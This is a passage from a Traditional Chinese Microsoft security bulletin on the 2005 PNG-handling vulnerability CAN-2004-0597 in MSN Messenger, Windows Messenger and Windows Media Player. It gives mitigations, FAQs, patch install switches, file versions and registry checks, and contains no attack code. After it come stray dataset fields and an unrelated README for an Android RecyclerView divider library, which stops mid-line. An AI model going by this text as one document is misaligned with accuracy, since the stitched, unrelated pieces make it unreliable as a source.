是否已接獲任何消息,指出這項弱點已遭有心人士惡用?** 否。 當本安全性公告初次發行時,Microsoft 並未接到任何有關本弱點已成為公開攻擊媒介的消息,也沒有發現任何以此概念發展的程式碼公開範例。 #### MSN Messenger 的 PNG 處理弱點 - CAN-2004-0597: 由於 MSN Messenger 處理損毀或格式不正確的 PNG 影像檔案的方式有問題,導致其中存在遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 #### MSN Messenger 的 PNG 處理弱點 - CAN-2004-0597 的緩和因素: - MSN Messenger 依照預設不允許匿名人士傳送訊息給您。 攻擊者必須先引誘您將他們加入您的連絡人清單。 #### MSN Messenger 的 PNG 處理弱點 - CAN-2004-0597 的因應措施: Microsoft 已經測試過以下的因應措施。 這些因應措施並不能徹底解決弱點,但是有助於封鎖已知的攻擊行為。 如果因應措施會降低功能,以下將會描述功能降低的情況。 - 不要將不認得或不信任的地址新增到您的連絡人清單。 - 重新檢查現有連絡人清單,移除不認識、不信任或不再需要的連絡人。 - 依照下列步驟,在 MSN Messenger 中停用顯示圖片: 按一下 \[工具\]。 按一下 \[選項\]。 按一下 \[個人\] 索引標籤 清除 \[在立即訊息對話中顯示其他人的圖片\] 核取方塊。 - 依照下列步驟停用表情符號: 按一下 \[工具\]。 按一下 \[選項\]。 按一下 \[訊息\] 索引標籤。 清除 \[在立即訊息中顯示表情符號\] 核取方塊 清除 \[在立即訊息中顯示自訂的表情符號\] 核取方塊 - 不要同意接收不認識或不信任的連絡人發起的檔案傳輸。 #### MSN Messenger 的 PNG 處理弱點 - CAN-2004-0597 的常見問題集: **這個弱點的範圍為何?** 這是遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **造成這個弱點的原因為何?** MSN Messenger 使用公開的 libpng 1.2.5 版程式庫,這個程式庫近期被發現有數項已知弱點。 **什麼是 PNG?** PNG 是 Portable Network Graphics (可攜式網路圖形) 的縮寫。 可攜式網路圖形 (PNG) 
格式是為了取代舊有較簡單的 GIF 格式所設計,也有部分是為了取代更為複雜的 TIFF 格式。 如需更多關於 PNG 的資訊,請參閱這個[網站](https://www.libpng.org/pub/png/pngintro.html) (英文)。 **攻擊者可能會利用這項弱點採取什麼行動?** 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **什麼人可以利用此弱點?** 攻擊者可說服使用者將其新增至連絡人清單,並傳送蓄意製作的表情符號或顯示圖片,以利用這項弱點。 **因為這個弱點而承受風險的主要系統有哪些?** 工作站和終端機伺服器的風險最高。 如果系統管理憑證不足的使用者被授予登入伺服器並執行程式的能力時,伺服器會面臨更大的風險。 然而,最佳實務強烈建議您制止這種行為。 **這項弱點是否會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響?** 是。 使用受影響 MSN Messenger 版本的客戶可安裝新版的 MSN Messenger 更新程式。 **更新的作用何在?** 更新程式會更新 MSN Messenger 使用的程式庫,改用會正確驗證所收到 PNG 檔案的程式庫,進而移除這項弱點。 **當安全性公告發行時,這項弱點是否已揭發出來?** 這些弱點已揭發出來,並被歸類為「一般性弱點」,揭示編號為 [CAN-2004-0597](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597)。 **當本安全性公告發行時,Microsoft 是否已接獲任何消息,指出這項弱點已遭有心人士惡用?** 否。 當本安全性公告初次發行時,Microsoft 並未接到任何有關本弱點已成為公開攻擊媒介的消息,也沒有發現任何以此概念發展的程式碼公開範例。 安全性更新資訊 -------------- **安裝平台及必要條件:** 如需有關您使用平台的特定安全性更新資訊,請按一下適當的連結: #### Windows 2000、Windows XP 及 Windows Server 2003 中的 Microsoft Windows Media Player 9 系列 **必要條件** 此安全性更新程式需要 Windows 2000 Service Pack 3 (SP3) 或 Service Pack 4 (SP4)、Windows XP Service Pack 1 (SP1)、Windows Server 2003 安裝 Windows Media Player 9。 以上所列的軟體版本已經過測試判斷其是否會受到影響。 其他版本已不再提供安全性更新支援,或是並不會受到影響。 請造訪 [Microsoft 產品技術支援週期準則網站](https://go.microsoft.com/fwlink/?linkid=21742),以瞭解您的產品及版本的支援生命週期。 如需更多關於如何取得最新 Service Pack 的資訊,請參閱 [Microsoft 知識庫文件編號 260910](https://support.microsoft.com/kb/260910)。 **未來將包含於 Service Pack 中的內容:** 此問題的更新程式會包含在未來的 Service Pack 或更新彙總套件中。 **安裝資訊** 這個安全性更新支援以下的安裝參數: **/help**             顯示命令列選項 **安裝模式** **/quiet**             無訊息模式 (無使用者互動,不顯示任何訊息) **/passive**            自動安裝模式 (僅顯示進度列) **/uninstall**          解除安裝套件 **重新啟動選項** **/norestart**          安裝完成時不要重新開機 **/forcerestart**      安裝之後重新開機 **特殊選項** **/l**                        列出安裝的 Windows Hotfix 或更新的套件 **/o**                       不先提示,直接覆寫 OEM 檔案 **/n**                       不備份解除安裝所需的檔案 **/f**                        當電腦關機時,強制其他程式結束 **/integrate:path**  將更新整合至位於指定路徑的 Windows 來源檔中 **/extract**             
不啟動安裝程式,直接解壓縮檔案 **注意:**您可以在同一個命令中合併使用這些參數。 為符合回溯相容性,安全性更新程式也支援舊版安裝公用程式使用的安裝參數。 有關支援的安裝參數的其他資訊,請參閱 [Microsoft 知識庫文件編號 262841](https://support.microsoft.com/kb/262841)。 如需更多關於 Update.exe 安裝程式的相關資訊,請造訪 [Microsoft TechNet 網站](https://go.microsoft.com/fwlink/?linkid=38951) (英文)。 **部署資訊** 在 Windows 2000 的 Windows Media Player 9 系列上,如想在不需要使用者介入的狀況下安裝安全性更新,請在命令提示字元使用下列命令: **WindowsMediaPlayer9-KB885492-x86-enu /passive /quiet** 在 Windows XP 及 Windows Server 2003 的 Windows Media Player 9 系列上,如想在不強制電腦重新開機的狀況下安裝安全性更新,請在命令提示字元下輸入以下的命令: **WindowsMediaPlayer9-KB885492-x86-enu /norestart** 如想瞭解如何透過 Software Update Services 部署這個安全性更新,請造訪 [Software Update Services 網站](https://www.microsoft.com/taiwan/windowsserversystem/sus/susoverview.mspx)。 **重新開機需求** 在某些情況下,此更新程式不需要重新開機。 安裝程式會停止所需服務,然後套用更新,再重新啟動服務。 不過,如果必要的服務無法停止,或是必要的檔案正在使用中,更新程式就會要求重新開機。 在此情況下,系統會出現訊息提示您重新開機。 **移除資訊** 如果要移除此更新程式,請使用 \[控制台\] 中的 \[新增或移除程式\] 工具。 系統管理員也可以使用 Spuninst.exe 公用程式來移除此安全性更新。 Spuninst.exe 公用程式位於 %Windir%\\$NTUninstallKB885492$\\Spuninst 資料夾中。 Spuninst.exe 公用程式支援以下的安裝參數: **/help**             顯示命令列選項 **安裝模式** **/quiet**             無訊息模式 (無使用者互動,不顯示任何訊息) **/passive**            自動安裝模式 (僅顯示進度列) **重新啟動選項** **/norestart**          安裝完成時不要重新開機 **/forcerestart**      安裝之後重新開機 **特殊選項** **/f**                        當電腦關機時,強制其他程式結束 **檔案資訊** 本更新程式的英文版本具有下表列出 (或更新) 的檔案屬性。 這些檔案的日期及時間均使用 Coordinated Universal Time (UTC)。 當您檢視檔案資訊時,它會轉換為當地時間。 如想知道 UTC 及當地時間的時差,請使用 \[控制台\] 中的 \[日期和時間\] 工具的 **\[時區\]** 索引標籤。 Windows 2000、Windows XP 及 Windows Server 2003 的 Microsoft Windows Media Player 9 系列: | 檔案名稱 | 版本 | 日期 | 時間 | 大小 | |----------|------------|-------------|-------|-----------| | Wmp.dll | 9.0.0.3250 | 04-Aug-2004 | 07:56 | 4,874,240 | **注意:**當您在 Windows Server 2003 電腦上安裝本安全性更新時,安裝程式會檢查系統上要更新的檔案先前是否曾經用 Microsoft Hotfix 更新。 如果您先前曾經安裝 Hotfix 更新其中一個受影響的檔案,安裝程式會將 RTMQFE 檔案複製到您的系統中。 否則,安裝程式會將 RTMGDR 檔案複製到您的系統中。 如需更多有關這種行為的資訊,請參閱 [Microsoft 知識庫文件編號 824994](https://support.microsoft.com/kb/824994)。 如需更多關於 Update.exe 
安裝程式的相關資訊,請造訪 [Microsoft TechNet 網站](https://go.microsoft.com/fwlink/?linkid=38951) (英文)。 如需更多關於出現於本公告中術語的相關資訊 (如 *Hotfix*),請參閱 [Microsoft 知識庫文件編號 824684](https://support.microsoft.com/kb/824684)。 **確認更新的安裝** - **Microsoft Baseline Security Analyzer** 如果要確認安全性更新已經安裝到受影響的系統,您可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。 這項工具讓系統管理員能夠掃描本機和遠端系統,找出遺漏的安全性更新,以及常見的錯誤安全性設定。 如需關於 MBSA 的詳細資訊,請造訪 [Microsoft Baseline Security Analyzer 網站](https://go.microsoft.com/fwlink/?linkid=21134) (英文)。 - **檔案版本驗證** **注意:**由於 Microsoft Windows 的版本眾多,您電腦上實際執行的步驟可能會與此處描述的不同。 如遇到不同的狀況,請參閱產品的說明文件以完成這些步驟。 1. 按一下 \[開始\],然後按一下 \[搜尋\]。 2. 在 \[搜尋結果\] 窗格中,在 \[搜尋小幫手\] 下按一下 \[所有檔案和資料夾\]。 3. 在 \[部份或完整的檔案名稱\] 方塊中,輸入適當檔案資訊表中的檔案名稱,再按一下 \[搜尋\]。 4. 在檔案清單中,用滑鼠右鍵按一下適當檔案資訊表格中某個檔案名稱,然後按一下 \[內容\]。 **注意:**根據作業系統的版本或已安裝之程式,部分列於檔案資訊表格中的檔案可能並未被安裝。 5. 在 \[版本\] 索引標籤中,與適當檔案資訊表格中記錄的版本加以比較,以找出安裝在電腦上的檔案的版本。 **注意:**在安裝時,檔案版本以外的屬性可能會變更。 在驗證更新程式安裝是否成功時,比對檔案資訊表中列出的其他檔案屬性並不是妥當的做法。 此外,在某些情況下,檔案的名稱在安裝時可能會有所變更。 如果缺少檔案或版本資訊,請採用其他可用的方法來驗證更新程式的安裝情形。 - **登錄機碼驗證** 您也可以查看下列登錄機碼,來確認此安全性更新程式所安裝的檔案。 Windows 2000、Windows XP 及 Windows Server 2003 的 Microsoft Windows Media Player 9 系列: HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Media Player\\wm885492 **注意:**此登錄機碼可能未包含完整的安裝檔案清單。 此外,當系統管理員或 OEM 將 885492 安全性更新整合或匯集到 Windows 安裝來源檔時,可能未正確建立這個登錄機碼。 #### Windows XP Service Pack 1 中的 Microsoft Windows Messenger 4.7.0.2009 **必要條件** 此安全性更新程式需要安裝 Microsoft Windows Messenger 4.7.0.2009 版 (在 Windows XP Service Pack 1 上使用時) **未來將包含於 Service Pack 中的內容:** 此問題的更新程式會包含在未來的 Service Pack 或更新彙總套件中。 **安裝資訊** 這個安全性更新支援以下的安裝參數: /**Q** 指定在檔案解壓縮時採用無訊息模式 (不出現提示訊息)。 /**Q:U** 指定採用使用者無訊息模式,會對使用者顯示一些對話方塊。 /**Q:A** 指定採用系統管理員無訊息模式,不會對使用者顯示任何對話方塊。 /**T**: **&lt;full path&gt;** 指定解壓縮檔案的目標資料夾。 /**C** 解壓縮檔案,但是並不進行安裝。 如果未指定 /**T**: 路徑,系統會出現提示訊息,要求您提供目標資料夾。 /**C**: **&lt;Cmd&gt;** 覆寫作者定義的安裝命令。 指定 Setup .inf 或 .exe 檔案的路徑和名稱。 /**R:N** 安裝之後絕不重新啟動電腦。 /**R:I** 遇到需要重新啟動電腦的狀況時,提示使用者重新啟動電腦,除非是與 **/Q:A** 搭配使用。 /**R:A** 安裝後永遠重新啟動電腦。 /**R:S** 安裝完成後,不提示使用者便重新啟動電腦。 
**注意:**並非所有的更新程式均適用這些參數。 如果某個參數無法使用,表示該功能是正常安裝該更新程式所不可或缺的功能。 此外也不支援使用 /**N:V** 參數,因為尚未支援且可能會導致系統無法重新啟動。 如果安裝失敗,請洽詢支援人員瞭解失敗的原因。 有關支援的安裝參數的其他資訊,請參閱 [Microsoft 知識庫文件編號 197147](https://support.microsoft.com/kb/197147) (英文)。 **部署資訊** 使用 Windows 2000 Service Pack 3、Windows 2000 Service Pack 4、Windows XP Service Pack 1 或 Windows Server 2003 時,如果要在不需要使用者介入,而且不要強制重新開機的情況下安裝安全性更新程式,請在命令提示字元下使用下列命令: **WindowsMessenger-KB887472-PreXPSP2-ENU /q:a /r:n** **重新開機需求** 在某些情況下,此更新程式不需要重新開機。 安裝程式會停止所需服務,然後套用更新,再重新啟動服務。 不過,如果必要的服務無法停止,或是必要的檔案正在使用中,更新程式就會要求重新開機。 在此情況下,系統會出現訊息提示您重新開機。 **移除資訊** 此更新程式無法解除安裝。 **檔案資訊** 本更新程式的英文版本具有下表列出 (或更新) 的檔案屬性。 這些檔案的日期及時間均使用 Coordinated Universal Time (UTC)。 當您檢視檔案資訊時,它會轉換為當地時間。 如想知道 UTC 及當地時間的時差,請使用 \[控制台\] 中的 \[日期和時間\] 工具的 \[時區\] 索引標籤。 Windows XP Service Pack 1 中的 Windows Messenger 4.7.0.2009 版: | 檔案名稱 | 版本 | 日期 | 時間 | 大小 | |------------|------------|-------------|-------|-----------| | Msmsgs.exe | 4.7.0.2010 | 16-Nov-2004 | 00:18 | 1,670,144 | **確認更新的安裝** - **Microsoft Baseline Security Analyzer** 如果要確認安全性更新已經安裝到受影響的系統,您可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。 這項工具讓系統管理員能夠掃描本機和遠端系統,找出遺漏的安全性更新,以及常見的錯誤安全性設定。 如需關於 MBSA 的詳細資訊,請造訪 [Microsoft Baseline Security Analyzer 網站](https://go.microsoft.com/fwlink/?linkid=21134) (英文)。 - **檔案版本驗證** **注意:**由於 Microsoft Windows 的版本眾多,您電腦上實際執行的步驟可能會與此處描述的不同。 如遇到不同的狀況,請參閱產品的說明文件以完成這些步驟。 1. 按一下 \[開始\],然後按一下 \[搜尋\]。 2. 在 \[搜尋結果\] 窗格中,在 \[搜尋小幫手\] 下按一下 \[所有檔案和資料夾\]。 3. 在 \[部份或完整的檔案名稱\] 方塊中,輸入適當檔案資訊表中的檔案名稱,再按一下 \[搜尋\]。 4. 在檔案清單中,用滑鼠右鍵按一下所需檔案名稱 (名稱來自適當檔案資訊表),再按 \[內容\]。 **注意:**視所安裝的作業系統或程式的版本而定,檔案資訊表中列出的檔案未必會全部安裝。 1. 
在 \[版本\] 索引標籤上,比較檔案版本與適當檔案資訊表中記錄的版本,判斷您電腦上安裝的檔案版本。 **注意:**在安裝時,檔案版本以外的屬性可能會變更。 在驗證更新程式安裝是否成功時,比對檔案資訊表中列出的其他檔案屬性並不是妥當的做法。 此外,在某些情況下,檔案的名稱在安裝時可能會有所變更。 如果缺少檔案或版本資訊,請採用其他可用的方法來驗證更新程式的安裝情形。 - **登錄機碼驗證** 您也可以確認下列登錄機碼是否含有資料值為 1 的 "Installed" DWORD 值,以檢查此安全性更新所安裝的檔案。 HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{5945c046-1e7d-11d1-bc44-00c04fd912be} **注意:**這些登錄機碼可能未包含完整的安裝檔案清單。 此外,當系統管理員或 OEM 將 887472 安全性更新整合或匯集到 Windows 安裝來源檔時,可能未正確建立這些登錄機碼。 #### Windows XP Service Pack 2 中的 Microsoft Windows Messenger 4.7.0.3000 版 **必要條件** 此安全性更新程式需要安裝 Microsoft 4.7.0.3000 (在 Windows XP Service Pack 2 上使用時) **未來將包含於 Service Pack 中的內容:** 此問題的更新程式會包含在未來的 Service Pack 或更新彙總套件中。 **安裝資訊** 這個安全性更新支援以下的安裝參數: **/help**             顯示命令列選項 **安裝模式** **/quiet**             無訊息模式 (無使用者互動,不顯示任何訊息) **/passive**            自動安裝模式 (僅顯示進度列) **/uninstall**          解除安裝套件 **重新啟動選項** **/norestart**          安裝完成時不要重新開機 **/forcerestart**      安裝之後重新開機 **特殊選項** **/l**                        列出安裝的 Windows Hotfix 或更新的套件 **/o**                       不先提示,直接覆寫 OEM 檔案 **/n**                       不備份解除安裝所需的檔案 **/f**                        當電腦關機時,強制其他程式結束 **/integrate:path**  將更新整合至位於指定路徑的 Windows 來源檔中 **/extract**             不啟動安裝程式,直接解壓縮檔案 **注意:**您可以在同一個命令中合併使用這些參數。 為符合回溯相容性,安全性更新程式也支援舊版安裝公用程式使用的安裝參數。 有關支援的安裝參數的其他資訊,請參閱 [Microsoft 知識庫文件編號 262841](https://support.microsoft.com/kb/262841)。 如需更多關於 Update.exe 安裝程式的相關資訊,請造訪 [Microsoft TechNet 網站](https://go.microsoft.com/fwlink/?linkid=38951) (英文)。 **部署資訊** 在 Windows XP Service Pack 2 上,如想在不需要使用者介入的狀況下安裝安全性更新,請在命令提示字元使用下列命令: **WindowsXP-KB887472-x86-enu /passive /quiet** 在 Windows XP Service Pack 2 上,如想在不強制系統重新開機的狀況下安裝安全性更新,請在命令提示字元下輸入下列命令: **WindowsXP-KB887472-x86-enu /norestart** 如需如何透過 Software Update Services 部署這個安全性更新的詳細資訊,請造訪 [Software Update Services 網站](https://www.microsoft.com/taiwan/windowsserversystem/sus/susoverview.mspx)。 **重新開機需求** 在某些情況下,此更新程式不需要重新開機。 安裝程式會停止所需服務,然後套用更新,再重新啟動服務。 
不過,如果必要的服務無法停止,或是必要的檔案正在使用中,更新程式就會要求重新開機。 在此情況下,系統會出現訊息提示您重新開機。 **移除資訊** 如果要移除這個安全性更新程式,請使用 \[控制台\] 中的 \[新增或移除程式\] 工具。 如為 Windows XP Service Pack 2:系統管理員也可使用 Spuninst.exe 公用程式移除此安全性更新程式。 Spuninst.exe 位於 %Windir%\\$NTUninstallKB887472$\\Spuninst 資料夾中。 Spuninst.exe 公用程式支援以下的安裝參數: **/help**             顯示命令列選項 **安裝模式** **/quiet**             無訊息模式 (無使用者互動,不顯示任何訊息) **/passive**            自動安裝模式 (僅顯示進度列) **重新啟動選項** **/norestart**          安裝完成時不要重新開機 **/forcerestart**      安裝之後重新開機 **特殊選項** **/f**                        當電腦關機時,強制其他程式結束 **檔案資訊** 本更新程式的英文版本具有下表列出 (或更新) 的檔案屬性。 這些檔案的日期及時間均使用 Coordinated Universal Time (UTC)。 當您檢視檔案資訊時,它會轉換為當地時間。 如想知道 UTC 及當地時間的時差,請使用 \[控制台\] 中的 \[日期和時間\] 工具的 \[時區\] 索引標籤。 Windows XP Service Pack 2 中的 Windows Messenger 4.7.0.3000 版: | 檔案名稱 | 版本 | 日期 | 時間 | 大小 | 資料夾 | |------------|------------|-------------|-------|-----------|--------| | Msmsgs.exe | 4.7.0.3001 | 13-Oct-2004 | 16:24 | 1,694,208 | SP2GDR | | Msmsgs.exe | 4.7.0.3001 | 13-Oct-2004 | 16:21 | 1,694,208 | SP2QFE | **確認更新的安裝** - **Microsoft Baseline Security Analyzer** 如果要確認安全性更新已經安裝到受影響的系統,您可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。 這項工具讓系統管理員能夠掃描本機和遠端系統,找出遺漏的安全性更新,以及常見的錯誤安全性設定。 如需關於 MBSA 的詳細資訊,請造訪 [Microsoft Baseline Security Analyzer 網站](https://go.microsoft.com/fwlink/?linkid=21134) (英文)。 - **檔案版本驗證** **注意:**由於 Microsoft Windows 的版本眾多,您電腦上實際執行的步驟可能會與此處描述的不同。 如遇到不同的狀況,請參閱產品的說明文件以完成這些步驟。 1. 按一下 \[開始\],然後按一下 \[搜尋\]。 2. 在 \[搜尋結果\] 窗格中,在 \[搜尋小幫手\] 下按一下 \[所有檔案和資料夾\]。 3. 在 \[部份或完整的檔案名稱\] 方塊中,輸入適當檔案資訊表中的檔案名稱,再按一下 \[搜尋\]。 4. 在檔案清單中,用滑鼠右鍵按一下適當檔案資訊表格中某個檔案名稱,然後按一下 \[內容\]。 **注意:**根據作業系統的版本或已安裝之程式,部分列於檔案資訊表格中的檔案可能並未被安裝。 5. 
在 \[版本\] 索引標籤中,與適當檔案資訊表格中記錄的版本加以比較,以找出安裝在電腦上的檔案的版本。 **注意:**在安裝時,檔案版本以外的屬性可能會變更。 在驗證更新程式安裝是否成功時,比對檔案資訊表中列出的其他檔案屬性並不是妥當的做法。 此外,在某些情況下,檔案的名稱在安裝時可能會有所變更。 如果缺少檔案或版本資訊,請採用其他可用的方法來驗證更新程式的安裝情形。 - **登錄機碼驗證** 您也可以查看下列登錄機碼,確認此安全性更新程式所安裝的檔案。 HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows XP\\SP3\\KB887472\\Filelist **注意:**這些登錄機碼可能未包含完整的安裝檔案清單。 此外,當系統管理員或 OEM 將 887472 安全性更新整合或匯集到 Windows 安裝來源檔時,可能未正確建立這些登錄機碼。 #### Microsoft Windows Messenger 5.0 **必要條件** 此安全性更新程式需要 Microsoft Windows 2000 Service Pack 4、Windows Server 2003、Windows XP Service Pack 1 或 Windows XP Service Pack 2。 **安裝資訊** 此安全性更新程式是以 [Windows Installer 3.0 版](https://msdn.microsoft.com/library/en-us/msi/setup/what_s_new_in_windows_installer_version_3_0.asp)所封裝。 如需更多資訊,請參閱[產品說明文件](https://msdn.microsoft.com/library/en-us/msi/setup/standard_installer_command_line_options.asp)。 **重新開機需求** 在某些情況下,此更新程式不需要重新開機。 安裝程式會停止所需服務,然後套用更新,再重新啟動服務。 不過,如果必要的服務無法停止,或是必要的檔案正在使用中,更新程式就會要求重新開機。 在此情況下,系統會出現訊息提示您重新開機。 **移除資訊** 如果要移除這個安全性更新程式,請使用 \[控制台\] 中的 \[新增或移除程式\] 工具。 **檔案資訊** 本更新程式的英文版本具有下表列出 (或更新) 的檔案屬性。 這些檔案的日期及時間均使用 Coordinated Universal Time (UTC)。 當您檢視檔案資訊時,它會轉換為當地時間。 如想知道 UTC 及當地時間的時差,請使用 \[控制台\] 中的 \[日期和時間\] 工具的 \[時區\] 索引標籤。 Windows 2000 Service Pack 4、Windows Server 2003、Windows XP Service Pack 1、Windows XP Service Pack 2 或 Windows XP Tablet PC Edition 中的 Windows Messenger 5.0: | 檔案名稱 | 版本 | 日期 | 時間 | 大小 | |------------|------|-------------|-------|-----------| | msmsgs.exe | 5.1 | 05-Aug-2003 | 17:29 | 1,578,160 | **確認更新的安裝** - **Microsoft Baseline Security Analyzer** 如果要確認安全性更新已經安裝到受影響的系統,您可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。 這項工具讓系統管理員能夠掃描本機和遠端系統,找出遺漏的安全性更新,以及常見的錯誤安全性設定。 如需關於 MBSA 的詳細資訊,請造訪 [Microsoft Baseline Security Analyzer 網站](https://go.microsoft.com/fwlink/?linkid=21134) (英文)。 - **檔案版本驗證** **注意:**由於 Microsoft Windows 的版本眾多,您電腦上實際執行的步驟可能會與此處描述的不同。 如遇到不同的狀況,請參閱產品的說明文件以完成這些步驟。 1. 按一下 \[開始\],然後按一下 \[搜尋\]。 2. 在 \[搜尋結果\] 窗格中,在 \[搜尋小幫手\] 下按一下 \[所有檔案和資料夾\]。 3. 
在 \[部份或完整的檔案名稱\] 方塊中,輸入適當檔案資訊表中的檔案名稱,再按一下 \[搜尋\]。 4. 在檔案清單中,用滑鼠右鍵按一下所需檔案名稱 (名稱來自適當檔案資訊表),再按 \[內容\]。 **注意:**視所安裝的作業系統或程式的版本而定,檔案資訊表中列出的檔案未必會全部安裝。 1. 在 \[版本\] 索引標籤上,比較檔案版本與適當檔案資訊表中記錄的版本,判斷您電腦上安裝的檔案版本。 **注意:**在安裝時,檔案版本以外的屬性可能會變更。 在驗證更新程式安裝是否成功時,比對檔案資訊表中列出的其他檔案屬性並不是妥當的做法。 此外,在某些情況下,檔案的名稱在安裝時可能會有所變更。 如果缺少檔案或版本資訊,請採用其他可用的方法來驗證更新程式的安裝情形。 #### MSN Messenger 6.2 **必要條件** 此安全性更新程式需要 MSN Messenger 6.2。 **重新開機需求** 此更新程式可能需要重新啟動電腦。 **移除資訊** 此更新程式無法解除安裝。 **確認更新的安裝** 若要確認受影響系統上是否安裝安全性更新程式,請執行下列步驟: 1. 在 MSN Messenger 中,依序按一下 \[說明\] 和 \[關於\]。 2. 查看版本號碼。 如果版本號碼是 6.2.205 或更新版本,表示更新程式已順利安裝。 ### 其他資訊 **感謝** Microsoft [感謝](https://go.microsoft.com/fwlink/?linkid=21127)下列人士協助我們一同保護我們的客戶: - [Core Security Technologies](https://www1.corest.com/home/home.php) 的 Carlos Sarraute 通報 MSN Messenger PNG 處理弱點 (CAN-2004-0597)。 **取得其他安全性更新:** 其他安全性問題的更新可由下列位置取得: - 安裝性更新可以從 [Microsoft 下載中心](https://www.microsoft.com/taiwan/download/)取得, 您也可以利用 "security\_patch" 關鍵字搜尋輕易地找到安全性更新。 - 使用者平台的更新程式可以從 [Windows Update 網站](https://go.microsoft.com/fwlink/?linkid=21130)取得。 **支援:** - 美國 及加拿大地區客戶可電洽 1-866-PCSAFETY [Microsoft 技術支援服務](https://go.microsoft.com/fwlink/?linkid=21131)以取得技術支援。 與安全性更新有關的支援電話不另外收費。 - 不同國家的客戶,可以從當地的 Microsoft 分公司取得支援。 與安全性更新有關的支援電話不另外收費。 如需更多關於連絡 Microsoft 技術支援的資訊,請造訪[世界各地技術支援網站](https://go.microsoft.com/fwlink/?linkid=21155)。 **安全性資源:** - [Microsoft TechNet 資訊安全](https://www.microsoft.com/taiwan/technet/security/default.mspx)網站提供了有關 Microsoft 產品安全性的其他資訊。 - [Microsoft Software Update Services](https://www.microsoft.com/taiwan/windowsserversystem/sus/default.mspx) - [Microsoft Baseline Security Analyzer](https://go.microsoft.com/fwlink/?linkid=21134) (MBSA) - [Windows Update](https://go.microsoft.com/fwlink/?linkid=21130) - Windows Update 目錄:如需更多關於 Windows Update 目錄的資訊,請參閱 [Microsoft 知識庫文件編號 323166](https://support.microsoft.com/kb/323166)。 - [Office Update](https://go.microsoft.com/fwlink/?linkid=21135) **Software Update Services:** Microsoft Software Update Services (SUS) 
能讓系統管理員以迅速可靠的方式,針對 Windows 2000 和 Windows Server 2003 伺服器以及執行 Windows 2000 Professional 或 Windows XP Professional 的桌面系統,部署最新的重要更新程式及安全性更新程式。 如需如何透過 Software Update Services 部署這個安全性更新的詳細資訊,請造訪 [Software Update Services 網站](https://www.microsoft.com/taiwan/windowsserversystem/sus/default.mspx)。 **Systems Management Server:** Microsoft Systems Management Server (SMS) 提供了深具彈性的企業解決方案,能夠對更新程式進行方便的管理。 透過 SMS,系統管理員能判斷有哪些 Windows 系統需要安全性更新,並控制更新程式在企業中的部署,同時將對使用者造成的干擾降到最低。 如需更多關於系統管理員如何使用 SMS 2003 部署安全性更新的資訊,請造訪 [SMS 2003 的安全性補充程式管理網站](https://www.microsoft.com/taiwan/smserver/evaluation/capabilities/patch.htm)。 SMS 2.0 使用者也可以利用 [SMS 軟體更新服務功能套件](https://go.microsoft.com/fwlink/?linkid=33340)來協助部署安全性更新。 如需關於 SMS 的詳細資訊,請造訪 [SMS 網站](https://www.microsoft.com/taiwan/smserver/default.htm)。 **注意:**SMS 使用 Microsoft Baseline Security Analyzer及 Microsoft Office Detection Tool,為安全性公告更新的偵測及部署作業提供相當廣泛的支援。 不過這些工具可能無法偵測部分的軟體更新。 在這些情況中,系統管理員可以利用 SMS 的清查功能,判斷特定系統所需要的更新程式。 如需這個程序的詳細資訊,請造訪這個[網站](https://go.microsoft.com/fwlink/?linkid=33341)。 某些安全性更新程式在電腦重新啟動之後,會需要系統管理員的權限。 系統管理員可以用 Elevated Rights Deployment Tool (隨 [SMS 2003 Administration Feature Pack](https://go.microsoft.com/fwlink/?linkid=33387) (英文) 和 [SMS 管理功能套件](https://go.microsoft.com/fwlink/?linkid=21161) (英文) 提供) 來安裝這些更新。 **免責聲明:** Microsoft 知識庫 (Microsoft Knowledge Base) 中的資訊係以其「現狀」提供,並不提供任何形式之擔保。 Microsoft 不做任何明示或默示的責任擔保,包括適售性以及適合某特定用途之擔保責任。 無論任何情況下的損害,Microsoft Corporation 及其供應商皆不負任何法律責任,包括直接、間接、偶發、衍生性、所失業務利益或特殊損害。即使 Microsoft Corporation 及其供應商已被告知此類損害的可能性亦不負任何責任。 某些地區不允許排除及限制衍生性或附隨損害賠償責任,因此前述限制不適用於這些地區。 **修訂:** - V1.0 (2005 年 2 月 8 日):公告發行 *Built at 2014-04-18T01:50:00Z-07:00*
39.487885
491
0.736215
yue_Hant
0.991443
6f559108ff5e2dad36f7b60cdc1accdc66e57ee9
4,456
md
Markdown
README.md
intrications/RecyclerView-FlexibleDivider
7ee2021734a8224f507849c3a5701458b1ca4d29
[ "Apache-2.0" ]
3
2015-11-04T03:54:49.000Z
2015-11-04T03:54:57.000Z
README.md
Cc-go/RecyclerView-FlexibleDivider
7ee2021734a8224f507849c3a5701458b1ca4d29
[ "Apache-2.0" ]
null
null
null
README.md
Cc-go/RecyclerView-FlexibleDivider
7ee2021734a8224f507849c3a5701458b1ca4d29
[ "Apache-2.0" ]
1
2021-03-25T02:11:06.000Z
2021-03-25T02:11:06.000Z
# RecyclerView-FlexibleDivider [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-RecyclerView--FlexibleDivider-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/1418) [![License](https://img.shields.io/badge/license-Apache%202-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0) [![Download](https://api.bintray.com/packages/yqritc/maven/recyclerview-flexibledivider/images/download.svg)](https://bintray.com/yqritc/maven/recyclerview-flexibledivider/_latestVersion) Android library providing a simple way to control divider items of RecyclerView ![Simple Divider](/sample/sample1.gif) ![Complex Divider](/sample/sample2.gif) # Release Note [Release Note](https://github.com/yqritc/RecyclerView-FlexibleDivider/releases) # Gradle ``` repositories { jcenter() } dependencies { compile 'com.yqritc:recyclerview-flexibledivider:1.2.6' } ``` # Usage The following is the simplest usage. It draws a divider drawable retrieved from android.R.attr.listDivider between each cell. ``` RecyclerView recyclerView = (RecyclerView) 